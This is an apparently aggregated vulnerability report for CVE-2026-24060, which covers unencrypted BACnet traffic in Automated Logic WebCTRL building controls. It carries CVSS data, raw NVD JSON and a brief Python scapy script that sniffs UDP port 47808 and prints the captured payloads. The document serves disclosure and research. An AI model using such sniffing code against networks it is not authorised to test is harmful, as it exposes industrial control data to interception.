Security Vulnerability Report
中文
CVE-2026-24060 CVSS 9.1 CRITICAL

CVE-2026-24060

Published: 2026-03-21 00:16:25
Last Modified: 2026-03-23 16:16:44
Source: [email protected]

Description

Service information is not encrypted when transmitted as BACnet packets over the wire, and can be sniffed, intercepted, and modified by an attacker. Valuable information such as the File Start Position and File Data can be sniffed from network traffic using Wireshark's BACnet dissector filter. The proprietary format used by WebCTRL to receive updates from the PLC can also be sniffed and reverse engineered.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Automated Logic WebCTRL (具体受影响版本请参考厂商安全公告)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for sniffing unencrypted BACnet traffic # This script demonstrates how an attacker can capture sensitive data from scapy.all import * # BACnet typically runs on UDP port 47808 def packet_callback(packet): if packet.haslayer(UDP) and packet[UDP].dport == 47808: print(f"[*] Captured BACnet packet from {packet[IP].src}") # In a real scenario, the payload would be parsed to extract File Start Position or Data print(f"Payload: {bytes(packet[UDP].payload)}") print("[*] Starting sniffer on port 47808...") sniff(filter="udp port 47808", prn=packet_callback, store=0)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24060", "sourceIdentifier": "[email protected]", "published": "2026-03-21T00:16:25.483", "lastModified": "2026-03-23T16:16:43.553", "vulnStatus": "Awaiting Analysis", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["unsupported-when-assigned"]}], "descriptions": [{"lang": "en", "value": "Service information is not encrypted when transmitted as BACnet packets \nover the wire, and can be sniffed, intercepted, and modified by an \nattacker. Valuable information such as the File Start Position and File \nData can be sniffed from network traffic using Wireshark's BACnet \ndissector filter. The proprietary format used by WebCTRL to receive \nupdates from the PLC can also be sniffed and reverse engineered."}, {"lang": "es", "value": "La información de servicio no está cifrada cuando se transmite como paquetes BACnet a través de la red, y puede ser olfateada, interceptada y modificada por un atacante. Información valiosa como la Posición de Inicio del Archivo y los Datos del Archivo puede ser olfateada del tráfico de red utilizando el filtro disector BACnet de Wireshark. El formato propietario utilizado por WebCTRL para recibir actualizaciones del PLC también puede ser olfateado y sometido a ingeniería inversa."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-319"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-319"}]}], "references": [{"url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-078-08.json", "source": "[email protected]"}, {"url": "https://www.automatedlogic.com/en/company/security-commitment/", "source": "[email protected]"}, {"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-078-08", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.